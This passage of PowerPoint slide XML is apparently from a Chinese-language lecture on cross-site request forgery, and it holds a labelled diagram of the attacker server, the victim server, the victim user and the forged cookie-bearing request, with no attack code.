          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="5173663"/>
            <a:ext cx="2436813" cy="846137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90119" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562391" y="4792663"/>
            <a:ext cx="1467068" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>攻击服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660066"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90120" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5667613" y="1414426"/>
            <a:ext cx="1467068" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>受害服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660066"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79881" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2427288" y="2257425"/>
            <a:ext cx="2830512" cy="617538"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90122" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="4248150"/>
            <a:ext cx="1210588" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>受害用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660066"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90123" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="3002844" y="2070070"/>
            <a:ext cx="1590500" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79884" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1828801" y="4572000"/>
            <a:ext cx="3047999" cy="1118654"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90125" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2944990" y="2847285"/>
            <a:ext cx="1723549" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>发送伪造请求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79886" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90127" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3011488" y="4298950"/>
            <a:ext cx="3076575" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>访问服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> iframe)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90128" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1211048">
            <a:off x="2167733" y="4750279"/>
            <a:ext cx="3077542" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>接收含有恶意代码的页面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90129" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2378075" y="2301875"/>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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90130" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2759075" y="3733800"/>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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90131" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="1952625" y="4159250"/>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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79892" name="Straight Arrow Connector 23"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2438400" y="2963863"/>
            <a:ext cx="2830513" cy="617537"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90133" name="Oval 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="3124200"/>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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90134" name="TextBox 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="986294" y="6248400"/>
            <a:ext cx="6771662" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>问题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>你一般多长时间维持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>weibo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>等的登陆状态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="3904434" y="3097798"/>
            <a:ext cx="1449436" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cookie)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6259" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="3048000"/>
            <a:ext cx="6705600" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80900" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="152400"/>
            <a:ext cx="7772400" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>跨站请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>(CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96262" name="Rectangle 6" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1295400"/>
            <a:ext cx="8229600" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
